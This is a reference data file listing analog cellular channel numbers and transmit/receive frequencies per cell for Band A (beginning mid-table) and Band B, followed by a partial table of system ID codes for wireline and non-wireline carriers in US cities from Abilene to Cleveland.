Channel 1 (324)     Tx 879.720    Rx 834.720
Channel 2 (303)     Tx 879.090    Rx 834.090
Channel 3 (282)     Tx 878.460    Rx 833.460
Channel 4 (261)     Tx 877.830    Rx 832.830
Channel 5 (240)     Tx 877.200    Rx 832.200
Channel 6 (219)     Tx 876.570    Rx 831.570
Channel 7 (198)     Tx 875.940    Rx 830.940
Channel 8 (177)     Tx 875.310    Rx 830.310
Channel 9 (156)     Tx 874.680    Rx 829.680
Channel 10 (135)    Tx 874.050    Rx 829.050
Channel 11 (114)    Tx 873.420    Rx 828.420
Channel 12 (93)     Tx 872.790    Rx 827.790
Channel 13 (72)     Tx 872.160    Rx 827.160
Channel 14 (51)     Tx 871.530    Rx 826.530
Channel 15 (30)     Tx 870.900    Rx 825.900
Channel 16 (9)      Tx 870.270    Rx 825.270

Cell # 11
--------------------------------------------------
Channel 1 (323)     Tx 879.690    Rx 834.690
Channel 2 (302)     Tx 879.060    Rx 834.060
Channel 3 (281)     Tx 878.430    Rx 833.430
Channel 4 (260)     Tx 877.800    Rx 832.800
Channel 5 (239)     Tx 877.170    Rx 832.170
Channel 6 (218)     Tx 876.540    Rx 831.540
Channel 7 (197)     Tx 875.910    Rx 830.910
Channel 8 (176)     Tx 875.280    Rx 830.280
Channel 9 (155)     Tx 874.650    Rx 829.650
Channel 10 (134)    Tx 874.020    Rx 829.020
Channel 11 (113)    Tx 873.390    Rx 828.390
Channel 12 (92)     Tx 872.760    Rx 827.760
Channel 13 (71)     Tx 872.130    Rx 827.130
Channel 14 (50)     Tx 871.500    Rx 826.500
Channel 15 (29)     Tx 870.870    Rx 825.870
Channel 16 (8)      Tx 870.240    Rx 825.240

Cell # 12
--------------------------------------------------
Channel 1 (322)     Tx 879.660    Rx 834.660
Channel 2 (301)     Tx 879.030    Rx 834.030
Channel 3 (280)     Tx 878.400    Rx 833.400
Channel 4 (259)     Tx 877.770    Rx 832.770
Channel 5 (238)     Tx 877.140    Rx 832.140
Channel 6 (217)     Tx 876.510    Rx 831.510
Channel 7 (196)     Tx 875.880    Rx 830.880
Channel 8 (175)     Tx 875.250    Rx 830.250
Channel 9 (154)     Tx 874.620    Rx 829.620
Channel 10 (133)    Tx 873.990    Rx 828.990
Channel 11 (112)    Tx 873.360    Rx 828.360
Channel 12 (91)     Tx 872.730    Rx 827.730
Channel 13 (70)     Tx 872.100    Rx 827.100
Channel 14 (49)     Tx 871.470    Rx 826.470
Channel 15 (28)     Tx 870.840    Rx 825.840
Channel 16 (7)      Tx 870.210    Rx 825.210

Cell # 13
--------------------------------------------------
Channel 1 (321)     Tx 879.630    Rx 834.630
Channel 2 (300)     Tx 879.000    Rx 834.000
Channel 3 (279)     Tx 878.370    Rx 833.370
Channel 4 (258)     Tx 877.740    Rx 832.740
Channel 5 (237)     Tx 877.110    Rx 832.110
Channel 6 (216)     Tx 876.480    Rx 831.480
Channel 7 (195)     Tx 875.850    Rx 830.850
Channel 8 (174)     Tx 875.220    Rx 830.220
Channel 9 (153)     Tx 874.590    Rx 829.590
Channel 10 (132)    Tx 873.960    Rx 828.960
Channel 11 (111)    Tx 873.330    Rx 828.330
Channel 12 (90)     Tx 872.700    Rx 827.700
Channel 13 (69)     Tx 872.070    Rx 827.070
Channel 14 (48)     Tx 871.440    Rx 826.440
Channel 15 (27)     Tx 870.810    Rx 825.810
Channel 16 (6)      Tx 870.180    Rx 825.180

Cell # 14
--------------------------------------------------
Channel 1 (320)     Tx 879.600    Rx 834.600
Channel 2 (299)     Tx 878.970    Rx 833.970
Channel 3 (278)     Tx 878.340    Rx 833.340
Channel 4 (257)     Tx 877.710    Rx 832.710
Channel 5 (236)     Tx 877.080    Rx 832.080
Channel 6 (215)     Tx 876.450    Rx 831.450
Channel 7 (194)     Tx 875.820    Rx 830.820
Channel 8 (173)     Tx 875.190    Rx 830.190
Channel 9 (152)     Tx 874.560    Rx 829.560
Channel 10 (131)    Tx 873.930    Rx 828.930
Channel 11 (110)    Tx 873.300    Rx 828.300
Channel 12 (89)     Tx 872.670    Rx 827.670
Channel 13 (68)     Tx 872.040    Rx 827.040
Channel 14 (47)     Tx 871.410    Rx 826.410
Channel 15 (26)     Tx 870.780    Rx 825.780
Channel 16 (5)      Tx 870.150    Rx 825.150

Cell # 15
--------------------------------------------------
Channel 1 (319)     Tx 879.570    Rx 834.570
Channel 2 (298)     Tx 878.940    Rx 833.940
Channel 3 (277)     Tx 878.310    Rx 833.310
Channel 4 (256)     Tx 877.680    Rx 832.680
Channel 5 (235)     Tx 877.050    Rx 832.050
Channel 6 (214)     Tx 876.420    Rx 831.420
Channel 7 (193)     Tx 875.790    Rx 830.790
Channel 8 (172)     Tx 875.160    Rx 830.160
Channel 9 (151)     Tx 874.530    Rx 829.530
Channel 10 (130)    Tx 873.900    Rx 828.900
Channel 11 (109)    Tx 873.270    Rx 828.270
Channel 12 (88)     Tx 872.640    Rx 827.640
Channel 13 (67)     Tx 872.010    Rx 827.010
Channel 14 (46)     Tx 871.380    Rx 826.380
Channel 15 (25)     Tx 870.750    Rx 825.750
Channel 16 (4)      Tx 870.120    Rx 825.120

Cell # 16
--------------------------------------------------
Channel 1 (318)     Tx 879.540    Rx 834.540
Channel 2 (297)     Tx 878.910    Rx 833.910
Channel 3 (276)     Tx 878.280    Rx 833.280
Channel 4 (255)     Tx 877.650    Rx 832.650
Channel 5 (234)     Tx 877.020    Rx 832.020
Channel 6 (213)     Tx 876.390    Rx 831.390
Channel 7 (192)     Tx 875.760    Rx 830.760
Channel 8 (171)     Tx 875.130    Rx 830.130
Channel 9 (150)     Tx 874.500    Rx 829.500
Channel 10 (129)    Tx 873.870    Rx 828.870
Channel 11 (108)    Tx 873.240    Rx 828.240
Channel 12 (87)     Tx 872.610    Rx 827.610
Channel 13 (66)     Tx 871.980    Rx 826.980
Channel 14 (45)     Tx 871.350    Rx 826.350
Channel 15 (24)     Tx 870.720    Rx 825.720
Channel 16 (3)      Tx 870.090    Rx 825.090

Cell # 17
--------------------------------------------------
Channel 1 (317)     Tx 879.510    Rx 834.510
Channel 2 (296)     Tx 878.880    Rx 833.880
Channel 3 (275)     Tx 878.250    Rx 833.250
Channel 4 (254)     Tx 877.620    Rx 832.620
Channel 5 (233)     Tx 876.990    Rx 831.990
Channel 6 (212)     Tx 876.360    Rx 831.360
Channel 7 (191)     Tx 875.730    Rx 830.730
Channel 8 (170)     Tx 875.100    Rx 830.100
Channel 9 (149)     Tx 874.470    Rx 829.470
Channel 10 (128)    Tx 873.840    Rx 828.840
Channel 11 (107)    Tx 873.210    Rx 828.210
Channel 12 (86)     Tx 872.580    Rx 827.580
Channel 13 (65)     Tx 871.950    Rx 826.950
Channel 14 (44)     Tx 871.320    Rx 826.320
Channel 15 (23)     Tx 870.690    Rx 825.690
Channel 16 (2)      Tx 870.060    Rx 825.060

Cell # 18
--------------------------------------------------
Channel 1 (316)     Tx 879.480    Rx 834.480
Channel 2 (295)     Tx 878.850    Rx 833.850
Channel 3 (274)     Tx 878.220    Rx 833.220
Channel 4 (253)     Tx 877.590    Rx 832.590
Channel 5 (232)     Tx 876.960    Rx 831.960
Channel 6 (211)     Tx 876.330    Rx 831.330
Channel 7 (190)     Tx 875.700    Rx 830.700
Channel 8 (169)     Tx 875.070    Rx 830.070
Channel 9 (148)     Tx 874.440    Rx 829.440
Channel 10 (127)    Tx 873.810    Rx 828.810
Channel 11 (106)    Tx 873.180    Rx 828.180
Channel 12 (85)     Tx 872.550    Rx 827.550
Channel 13 (64)     Tx 871.920    Rx 826.920
Channel 14 (43)     Tx 871.290    Rx 826.290
Channel 15 (22)     Tx 870.660    Rx 825.660
Channel 16 (1)      Tx 870.030    Rx 825.030

Cell # 19
--------------------------------------------------
Channel 1 (315)     Tx 879.450    Rx 834.450
Channel 2 (294)     Tx 878.820    Rx 833.820
Channel 3 (273)     Tx 878.190    Rx 833.190
Channel 4 (252)     Tx 877.560    Rx 832.560
Channel 5 (231)     Tx 876.930    Rx 831.930
Channel 6 (210)     Tx 876.300    Rx 831.300
Channel 7 (189)     Tx 875.670    Rx 830.670
Channel 8 (168)     Tx 875.040    Rx 830.040
Channel 9 (147)     Tx 874.410    Rx 829.410
Channel 10 (126)    Tx 873.780    Rx 828.780
Channel 11 (105)    Tx 873.150    Rx 828.150
Channel 12 (84)     Tx 872.520    Rx 827.520
Channel 13 (63)     Tx 871.890    Rx 826.890
Channel 14 (42)     Tx 871.260    Rx 826.260
Channel 15 (21)     Tx 870.630    Rx 825.630

Cell # 20
--------------------------------------------------
Channel 1 (314)     Tx 879.420    Rx 834.420
Channel 2 (293)     Tx 878.790    Rx 833.790
Channel 3 (272)     Tx 878.160    Rx 833.160
Channel 4 (251)     Tx 877.530    Rx 832.530
Channel 5 (230)     Tx 876.900    Rx 831.900
Channel 6 (209)     Tx 876.270    Rx 831.270
Channel 7 (188)     Tx 875.640    Rx 830.640
Channel 8 (167)     Tx 875.010    Rx 830.010
Channel 9 (146)     Tx 874.380    Rx 829.380
Channel 10 (125)    Tx 873.750    Rx 828.750
Channel 11 (104)    Tx 873.120    Rx 828.120
Channel 12 (83)     Tx 872.490    Rx 827.490
Channel 13 (62)     Tx 871.860    Rx 826.860
Channel 14 (41)     Tx 871.230    Rx 826.230
Channel 15 (20)     Tx 870.600    Rx 825.600

Cell # 21
--------------------------------------------------
Channel 1 (313)     Tx 879.390    Rx 834.390
Channel 2 (292)     Tx 878.760    Rx 833.760
Channel 3 (271)     Tx 878.130    Rx 833.130
Channel 4 (250)     Tx 877.500    Rx 832.500
Channel 5 (229)     Tx 876.870    Rx 831.870
Channel 6 (208)     Tx 876.240    Rx 831.240
Channel 7 (187)     Tx 875.610    Rx 830.610
Channel 8 (166)     Tx 874.980    Rx 829.980
Channel 9 (145)     Tx 874.350    Rx 829.350
Channel 10 (124)    Tx 873.720    Rx 828.720
Channel 11 (103)    Tx 873.090    Rx 828.090
Channel 12 (82)     Tx 872.460    Rx 827.460
Channel 13 (61)     Tx 871.830    Rx 826.830
Channel 14 (40)     Tx 871.200    Rx 826.200
Channel 15 (19)     Tx 870.570    Rx 825.570

**************************************************

BAND B

Cell # 1
--------------------------------------------------
Channel 1 (334)     Tx 880.020    Rx 835.020
Channel 2 (355)     Tx 880.650    Rx 835.650
Channel 3 (376)     Tx 881.280    Rx 836.280
Channel 4 (397)     Tx 881.910    Rx 836.910
Channel 5 (418)     Tx 882.540    Rx 837.540
Channel 6 (439)     Tx 883.170    Rx 838.170
Channel 7 (460)     Tx 883.800    Rx 838.800
Channel 8 (481)     Tx 884.430    Rx 839.430
Channel 9 (502)     Tx 885.060    Rx 840.060
Channel 10 (523)    Tx 885.690    Rx 840.690
Channel 11 (544)    Tx 886.320    Rx 841.320
Channel 12 (565)    Tx 886.950    Rx 841.950
Channel 13 (586)    Tx 887.580    Rx 842.580
Channel 14 (607)    Tx 888.210    Rx 843.210
Channel 15 (628)    Tx 888.840    Rx 843.840
Channel 16 (649)    Tx 889.470    Rx 844.470

Cell # 2
--------------------------------------------------
Channel 1 (335)     Tx 880.050    Rx 835.050
Channel 2 (356)     Tx 880.680    Rx 835.680
Channel 3 (377)     Tx 881.310    Rx 836.310
Channel 4 (398)     Tx 881.940    Rx 836.940
Channel 5 (419)     Tx 882.570    Rx 837.570
Channel 6 (440)     Tx 883.200    Rx 838.200
Channel 7 (461)     Tx 883.830    Rx 838.830
Channel 8 (482)     Tx 884.460    Rx 839.460
Channel 9 (503)     Tx 885.090    Rx 840.090
Channel 10 (524)    Tx 885.720    Rx 840.720
Channel 11 (545)    Tx 886.350    Rx 841.350
Channel 12 (566)    Tx 886.980    Rx 841.980
Channel 13 (587)    Tx 887.610    Rx 842.610
Channel 14 (608)    Tx 888.240    Rx 843.240
Channel 15 (629)    Tx 888.870    Rx 843.870
Channel 16 (650)    Tx 889.500    Rx 844.500

Cell # 3
--------------------------------------------------
Channel 1 (336)     Tx 880.080    Rx 835.080
Channel 2 (357)     Tx 880.710    Rx 835.710
Channel 3 (378)     Tx 881.340    Rx 836.340
Channel 4 (399)     Tx 881.970    Rx 836.970
Channel 5 (420)     Tx 882.600    Rx 837.600
Channel 6 (441)     Tx 883.230    Rx 838.230
Channel 7 (462)     Tx 883.860    Rx 838.860
Channel 8 (483)     Tx 884.490    Rx 839.490
Channel 9 (504)     Tx 885.120    Rx 840.120
Channel 10 (525)    Tx 885.750    Rx 840.750
Channel 11 (546)    Tx 886.380    Rx 841.380
Channel 12 (567)    Tx 887.010    Rx 842.010
Channel 13 (588)    Tx 887.640    Rx 842.640
Channel 14 (609)    Tx 888.270    Rx 843.270
Channel 15 (630)    Tx 888.900    Rx 843.900
Channel 16 (651)    Tx 889.530    Rx 844.530

Cell # 4
--------------------------------------------------
Channel 1 (337)     Tx 880.110    Rx 835.110
Channel 2 (358)     Tx 880.740    Rx 835.740
Channel 3 (379)     Tx 881.370    Rx 836.370
Channel 4 (400)     Tx 882.000    Rx 837.000
Channel 5 (421)     Tx 882.630    Rx 837.630
Channel 6 (442)     Tx 883.260    Rx 838.260
Channel 7 (463)     Tx 883.890    Rx 838.890
Channel 8 (484)     Tx 884.520    Rx 839.520
Channel 9 (505)     Tx 885.150    Rx 840.150
Channel 10 (526)    Tx 885.780    Rx 840.780
Channel 11 (547)    Tx 886.410    Rx 841.410
Channel 12 (568)    Tx 887.040    Rx 842.040
Channel 13 (589)    Tx 887.670    Rx 842.670
Channel 14 (610)    Tx 888.300    Rx 843.300
Channel 15 (631)    Tx 888.930    Rx 843.930
Channel 16 (652)    Tx 889.560    Rx 844.560

Cell # 5
--------------------------------------------------
Channel 1 (338)     Tx 880.140    Rx 835.140
Channel 2 (359)     Tx 880.770    Rx 835.770
Channel 3 (380)     Tx 881.400    Rx 836.400
Channel 4 (401)     Tx 882.030    Rx 837.030
Channel 5 (422)     Tx 882.660    Rx 837.660
Channel 6 (443)     Tx 883.290    Rx 838.290
Channel 7 (464)     Tx 883.920    Rx 838.920
Channel 8 (485)     Tx 884.550    Rx 839.550
Channel 9 (506)     Tx 885.180    Rx 840.180
Channel 10 (527)    Tx 885.810    Rx 840.810
Channel 11 (548)    Tx 886.440    Rx 841.440
Channel 12 (569)    Tx 887.070    Rx 842.070
Channel 13 (590)    Tx 887.700    Rx 842.700
Channel 14 (611)    Tx 888.330    Rx 843.330
Channel 15 (632)    Tx 888.960    Rx 843.960
Channel 16 (653)    Tx 889.590    Rx 844.590

Cell # 6
--------------------------------------------------
Channel 1 (339)     Tx 880.170    Rx 835.170
Channel 2 (360)     Tx 880.800    Rx 835.800
Channel 3 (381)     Tx 881.430    Rx 836.430
Channel 4 (402)     Tx 882.060    Rx 837.060
Channel 5 (423)     Tx 882.690    Rx 837.690
Channel 6 (444)     Tx 883.320    Rx 838.320
Channel 7 (465)     Tx 883.950    Rx 838.950
Channel 8 (486)     Tx 884.580    Rx 839.580
Channel 9 (507)     Tx 885.210    Rx 840.210
Channel 10 (528)    Tx 885.840    Rx 840.840
Channel 11 (549)    Tx 886.470    Rx 841.470
Channel 12 (570)    Tx 887.100    Rx 842.100
Channel 13 (591)    Tx 887.730    Rx 842.730
Channel 14 (612)    Tx 888.360    Rx 843.360
Channel 15 (633)    Tx 888.990    Rx 843.990
Channel 16 (654)    Tx 889.620    Rx 844.620

Cell # 7
--------------------------------------------------
Channel 1 (340)     Tx 880.200    Rx 835.200
Channel 2 (361)     Tx 880.830    Rx 835.830
Channel 3 (382)     Tx 881.460    Rx 836.460
Channel 4 (403)     Tx 882.090    Rx 837.090
Channel 5 (424)     Tx 882.720    Rx 837.720
Channel 6 (445)     Tx 883.350    Rx 838.350
Channel 7 (466)     Tx 883.980    Rx 838.980
Channel 8 (487)     Tx 884.610    Rx 839.610
Channel 9 (508)     Tx 885.240    Rx 840.240
Channel 10 (529)    Tx 885.870    Rx 840.870
Channel 11 (550)    Tx 886.500    Rx 841.500
Channel 12 (571)    Tx 887.130    Rx 842.130
Channel 13 (592)    Tx 887.760    Rx 842.760
Channel 14 (613)    Tx 888.390    Rx 843.390
Channel 15 (634)    Tx 889.020    Rx 844.020
Channel 16 (655)    Tx 889.650    Rx 844.650

Cell # 8
--------------------------------------------------
Channel 1 (341)     Tx 880.230    Rx 835.230
Channel 2 (362)     Tx 880.860    Rx 835.860
Channel 3 (383)     Tx 881.490    Rx 836.490
Channel 4 (404)     Tx 882.120    Rx 837.120
Channel 5 (425)     Tx 882.750    Rx 837.750
Channel 6 (446)     Tx 883.380    Rx 838.380
Channel 7 (467)     Tx 884.010    Rx 839.010
Channel 8 (488)     Tx 884.640    Rx 839.640
Channel 9 (509)     Tx 885.270    Rx 840.270
Channel 10 (530)    Tx 885.900    Rx 840.900
Channel 11 (551)    Tx 886.530    Rx 841.530
Channel 12 (572)    Tx 887.160    Rx 842.160
Channel 13 (593)    Tx 887.790    Rx 842.790
Channel 14 (614)    Tx 888.420    Rx 843.420
Channel 15 (635)    Tx 889.050    Rx 844.050
Channel 16 (656)    Tx 889.680    Rx 844.680

Cell # 9
--------------------------------------------------
Channel 1 (342)     Tx 880.260    Rx 835.260
Channel 2 (363)     Tx 880.890    Rx 835.890
Channel 3 (384)     Tx 881.520    Rx 836.520
Channel 4 (405)     Tx 882.150    Rx 837.150
Channel 5 (426)     Tx 882.780    Rx 837.780
Channel 6 (447)     Tx 883.410    Rx 838.410
Channel 7 (468)     Tx 884.040    Rx 839.040
Channel 8 (489)     Tx 884.670    Rx 839.670
Channel 9 (510)     Tx 885.300    Rx 840.300
Channel 10 (531)    Tx 885.930    Rx 840.930
Channel 11 (552)    Tx 886.560    Rx 841.560
Channel 12 (573)    Tx 887.190    Rx 842.190
Channel 13 (594)    Tx 887.820    Rx 842.820
Channel 14 (615)    Tx 888.450    Rx 843.450
Channel 15 (636)    Tx 889.080    Rx 844.080
Channel 16 (657)    Tx 889.710    Rx 844.710

Cell # 10
--------------------------------------------------
Channel 1 (343)     Tx 880.290    Rx 835.290
Channel 2 (364)     Tx 880.920    Rx 835.920
Channel 3 (385)     Tx 881.550    Rx 836.550
Channel 4 (406)     Tx 882.180    Rx 837.180
Channel 5 (427)     Tx 882.810    Rx 837.810
Channel 6 (448)     Tx 883.440    Rx 838.440
Channel 7 (469)     Tx 884.070    Rx 839.070
Channel 8 (490)     Tx 884.700    Rx 839.700
Channel 9 (511)     Tx 885.330    Rx 840.330
Channel 10 (532)    Tx 885.960    Rx 840.960
Channel 11 (553)    Tx 886.590    Rx 841.590
Channel 12 (574)    Tx 887.220    Rx 842.220
Channel 13 (595)    Tx 887.850    Rx 842.850
Channel 14 (616)    Tx 888.480    Rx 843.480
Channel 15 (637)    Tx 889.110    Rx 844.110
Channel 16 (658)    Tx 889.740    Rx 844.740

Cell # 11
--------------------------------------------------
Channel 1 (344)     Tx 880.320    Rx 835.320
Channel 2 (365)     Tx 880.950    Rx 835.950
Channel 3 (386)     Tx 881.580    Rx 836.580
Channel 4 (407)     Tx 882.210    Rx 837.210
Channel 5 (428)     Tx 882.840    Rx 837.840
Channel 6 (449)     Tx 883.470    Rx 838.470
Channel 7 (470)     Tx 884.100    Rx 839.100
Channel 8 (491)     Tx 884.730    Rx 839.730
Channel 9 (512)     Tx 885.360    Rx 840.360
Channel 10 (533)    Tx 885.990    Rx 840.990
Channel 11 (554)    Tx 886.620    Rx 841.620
Channel 12 (575)    Tx 887.250    Rx 842.250
Channel 13 (596)    Tx 887.880    Rx 842.880
Channel 14 (617)    Tx 888.510    Rx 843.510
Channel 15 (638)    Tx 889.140    Rx 844.140
Channel 16 (659)    Tx 889.770    Rx 844.770

Cell # 12
--------------------------------------------------
Channel 1 (345)     Tx 880.350    Rx 835.350
Channel 2 (366)     Tx 880.980    Rx 835.980
Channel 3 (387)     Tx 881.610    Rx 836.610
Channel 4 (408)     Tx 882.240    Rx 837.240
Channel 5 (429)     Tx 882.870    Rx 837.870
Channel 6 (450)     Tx 883.500    Rx 838.500
Channel 7 (471)     Tx 884.130    Rx 839.130
Channel 8 (492)     Tx 884.760    Rx 839.760
Channel 9 (513)     Tx 885.390    Rx 840.390
Channel 10 (534)    Tx 886.020    Rx 841.020
Channel 11 (555)    Tx 886.650    Rx 841.650
Channel 12 (576)    Tx 887.280    Rx 842.280
Channel 13 (597)    Tx 887.910    Rx 842.910
Channel 14 (618)    Tx 888.540    Rx 843.540
Channel 15 (639)    Tx 889.170    Rx 844.170
Channel 16 (660)    Tx 889.800    Rx 844.800

Cell # 13
--------------------------------------------------
Channel 1 (346)     Tx 880.380    Rx 835.380
Channel 2 (367)     Tx 881.010    Rx 836.010
Channel 3 (388)     Tx 881.640    Rx 836.640
Channel 4 (409)     Tx 882.270    Rx 837.270
Channel 5 (430)     Tx 882.900    Rx 837.900
Channel 6 (451)     Tx 883.530    Rx 838.530
Channel 7 (472)     Tx 884.160    Rx 839.160
Channel 8 (493)     Tx 884.790    Rx 839.790
Channel 9 (514)     Tx 885.420    Rx 840.420
Channel 10 (535)    Tx 886.050    Rx 841.050
Channel 11 (556)    Tx 886.680    Rx 841.680
Channel 12 (577)    Tx 887.310    Rx 842.310
Channel 13 (598)    Tx 887.940    Rx 842.940
Channel 14 (619)    Tx 888.570    Rx 843.570
Channel 15 (640)    Tx 889.200    Rx 844.200
Channel 16 (661)    Tx 889.830    Rx 844.830

Cell # 14
--------------------------------------------------
Channel 1 (347)     Tx 880.410    Rx 835.410
Channel 2 (368)     Tx 881.040    Rx 836.040
Channel 3 (389)     Tx 881.670    Rx 836.670
Channel 4 (410)     Tx 882.300    Rx 837.300
Channel 5 (431)     Tx 882.930    Rx 837.930
Channel 6 (452)     Tx 883.560    Rx 838.560
Channel 7 (473)     Tx 884.190    Rx 839.190
Channel 8 (494)     Tx 884.820    Rx 839.820
Channel 9 (515)     Tx 885.450    Rx 840.450
Channel 10 (536)    Tx 886.080    Rx 841.080
Channel 11 (557)    Tx 886.710    Rx 841.710
Channel 12 (578)    Tx 887.340    Rx 842.340
Channel 13 (599)    Tx 887.970    Rx 842.970
Channel 14 (620)    Tx 888.600    Rx 843.600
Channel 15 (641)    Tx 889.230    Rx 844.230
Channel 16 (662)    Tx 889.860    Rx 844.860

Cell # 15
--------------------------------------------------
Channel 1 (348)     Tx 880.440    Rx 835.440
Channel 2 (369)     Tx 881.070    Rx 836.070
Channel 3 (390)     Tx 881.700    Rx 836.700
Channel 4 (411)     Tx 882.330    Rx 837.330
Channel 5 (432)     Tx 882.960    Rx 837.960
Channel 6 (453)     Tx 883.590    Rx 838.590
Channel 7 (474)     Tx 884.220    Rx 839.220
Channel 8 (495)     Tx 884.850    Rx 839.850
Channel 9 (516)     Tx 885.480    Rx 840.480
Channel 10 (537)    Tx 886.110    Rx 841.110
Channel 11 (558)    Tx 886.740    Rx 841.740
Channel 12 (579)    Tx 887.370    Rx 842.370
Channel 13 (600)    Tx 888.000    Rx 843.000
Channel 14 (621)    Tx 888.630    Rx 843.630
Channel 15 (642)    Tx 889.260    Rx 844.260
Channel 16 (663)    Tx 889.890    Rx 844.890

Cell # 16
--------------------------------------------------
Channel 1 (349)     Tx 880.470    Rx 835.470
Channel 2 (370)     Tx 881.100    Rx 836.100
Channel 3 (391)     Tx 881.730    Rx 836.730
Channel 4 (412)     Tx 882.360    Rx 837.360
Channel 5 (433)     Tx 882.990    Rx 837.990
Channel 6 (454)     Tx 883.620    Rx 838.620
Channel 7 (475)     Tx 884.250    Rx 839.250
Channel 8 (496)     Tx 884.880    Rx 839.880
Channel 9 (517)     Tx 885.510    Rx 840.510
Channel 10 (538)    Tx 886.140    Rx 841.140
Channel 11 (559)    Tx 886.770    Rx 841.770
Channel 12 (580)    Tx 887.400    Rx 842.400
Channel 13 (601)    Tx 888.030    Rx 843.030
Channel 14 (622)    Tx 888.660    Rx 843.660
Channel 15 (643)    Tx 889.290    Rx 844.290
Channel 16 (664)    Tx 889.920    Rx 844.920

Cell # 17
--------------------------------------------------
Channel 1 (350)     Tx 880.500    Rx 835.500
Channel 2 (371)     Tx 881.130    Rx 836.130
Channel 3 (392)     Tx 881.760    Rx 836.760
Channel 4 (413)     Tx 882.390    Rx 837.390
Channel 5 (434)     Tx 883.020    Rx 838.020
Channel 6 (455)     Tx 883.650    Rx 838.650
Channel 7 (476)     Tx 884.280    Rx 839.280
Channel 8 (497)     Tx 884.910    Rx 839.910
Channel 9 (518)     Tx 885.540    Rx 840.540
Channel 10 (539)    Tx 886.170    Rx 841.170
Channel 11 (560)    Tx 886.800    Rx 841.800
Channel 12 (581)    Tx 887.430    Rx 842.430
Channel 13 (602)    Tx 888.060    Rx 843.060
Channel 14 (623)    Tx 888.690    Rx 843.690
Channel 15 (644)    Tx 889.320    Rx 844.320
Channel 16 (665)    Tx 889.950    Rx 844.950

Cell # 18
--------------------------------------------------
Channel 1 (351)     Tx 880.530    Rx 835.530
Channel 2 (372)     Tx 881.160    Rx 836.160
Channel 3 (393)     Tx 881.790    Rx 836.790
Channel 4 (414)     Tx 882.420    Rx 837.420
Channel 5 (435)     Tx 883.050    Rx 838.050
Channel 6 (456)     Tx 883.680    Rx 838.680
Channel 7 (477)     Tx 884.310    Rx 839.310
Channel 8 (498)     Tx 884.940    Rx 839.940
Channel 9 (519)     Tx 885.570    Rx 840.570
Channel 10 (540)    Tx 886.200    Rx 841.200
Channel 11 (561)    Tx 886.830    Rx 841.830
Channel 12 (582)    Tx 887.460    Rx 842.460
Channel 13 (603)    Tx 888.090    Rx 843.090
Channel 14 (624)    Tx 888.720    Rx 843.720
Channel 15 (645)    Tx 889.350    Rx 844.350
Channel 16 (666)    Tx 889.980    Rx 844.980

Cell # 19
--------------------------------------------------
Channel 1 (352)     Tx 880.560    Rx 835.560
Channel 2 (373)     Tx 881.190    Rx 836.190
Channel 3 (394)     Tx 881.820    Rx 836.820
Channel 4 (415)     Tx 882.450    Rx 837.450
Channel 5 (436)     Tx 883.080    Rx 838.080
Channel 6 (457)     Tx 883.710    Rx 838.710
Channel 7 (478)     Tx 884.340    Rx 839.340
Channel 8 (499)     Tx 884.970    Rx 839.970
Channel 9 (520)     Tx 885.600    Rx 840.600
Channel 10 (541)    Tx 886.230    Rx 841.230
Channel 11 (562)    Tx 886.860    Rx 841.860
Channel 12 (583)    Tx 887.490    Rx 842.490
Channel 13 (604)    Tx 888.120    Rx 843.120
Channel 14 (625)    Tx 888.750    Rx 843.750
Channel 15 (646)    Tx 889.380    Rx 844.380

Cell # 20
--------------------------------------------------
Channel 1 (353)     Tx 880.590    Rx 835.590
Channel 2 (374)     Tx 881.220    Rx 836.220
Channel 3 (395)     Tx 881.850    Rx 836.850
Channel 4 (416)     Tx 882.480    Rx 837.480
Channel 5 (437)     Tx 883.110    Rx 838.110
Channel 6 (458)     Tx 883.740    Rx 838.740
Channel 7 (479)     Tx 884.370    Rx 839.370
Channel 8 (500)     Tx 885.000    Rx 840.000
Channel 9 (521)     Tx 885.630    Rx 840.630
Channel 10 (542)    Tx 886.260    Rx 841.260
Channel 11 (563)    Tx 886.890    Rx 841.890
Channel 12 (584)    Tx 887.520    Rx 842.520
Channel 13 (605)    Tx 888.150    Rx 843.150
Channel 14 (626)    Tx 888.780    Rx 843.780
Channel 15 (647)    Tx 889.410    Rx 844.410

Cell # 21
--------------------------------------------------
Channel 1 (354)     Tx 880.620    Rx 835.620
Channel 2 (375)     Tx 881.250    Rx 836.250
Channel 3 (396)     Tx 881.880    Rx 836.880
Channel 4 (417)     Tx 882.510    Rx 837.510
Channel 5 (438)     Tx 883.140    Rx 838.140
Channel 6 (459)     Tx 883.770    Rx 838.770
Channel 7 (480)     Tx 884.400    Rx 839.400
Channel 8 (501)     Tx 885.030    Rx 840.030
Channel 9 (522)     Tx 885.660    Rx 840.660
Channel 10 (543)    Tx 886.290    Rx 841.290
Channel 11 (564)    Tx 886.920    Rx 841.920
Channel 12 (585)    Tx 887.550    Rx 842.550
Channel 13 (606)    Tx 888.180    Rx 843.180
Channel 14 (627)    Tx 888.810    Rx 843.810
Channel 15 (648)    Tx 889.440    Rx 844.440

SIDH CODES

CITY                    NON WIRELINE  WIRELINE
Abilene, TX             131           422
Aiken, GA               181           084
Akron, OH               073           054
Albany, GA              241           204
Albany, NY              063           078
Albuquerque, NM         079           110
Alexandria, VA          243           212
Allentown, PA           103           008
Alton, IL               017           046
Altoona, PA             247           032
Amarillo, TX            249           422
Anchorage, AK           251           234
Anderson, SC            139           116
Anniston, AL            255           098
Appleton, WI            217           240
Asheville, NC           263           246
Ashland, WV             307           xxx
Athens, AL              203           198
Athens, GA              041           034
Atlanta, GA             041           034
Atlantic City, NJ       267           250
Augusta, GA             181           084
Aurora, IL              001           020
Austin, TX              107           164
Bakersfield, CA         183           228
Baltimore, MD           013           018
Bangor, ME              271           254
Baton Rouge, LA         085           106
Battle Creek, MI        403           256
Beaumont, TX            185           012
Bellingham, WA          047           006
Beloit, WI              217           210
Benton Harbor, MI       277           260
Biddeford, ME           501           484
Billings, MT            279           262
Biloxi, MS              281           264
Binghamton, NY          283           266
Birmingham, AL          113           098
Bishop, CA              1063          xxx
Bismarck, ND            285           268
Bloomington, IL         455           532
Boise, ID               289           272
Boston, MA              007           028
Bradenton, FL           175           042
Bremerton, WA           047           006
Bridgeport, CT          119           088
Bristol, TN             149           042
Brownsville, TX         451           434
Bryan, TX               297           280
Buffalo, NY             003           056
Burlington, NC          069           144
Burlington, VT          313           300
Canton, OH              073           054
Casper, WY              301           284
Cedar Falls, IA         589           568
Cedar Rapids, IA        303           286
Champaign, IL           305           532
Charleston, WV          307           290
Charleston, SC          127           156
Charlotte, NC           139           114
Charlottesville, VA     309           292
Chattanooga, TN         161           148
Chicago, IL             001             020
Cincinnati, OH          051             014
Clarksville, TN         179             296
Cleveland, OH           015             054
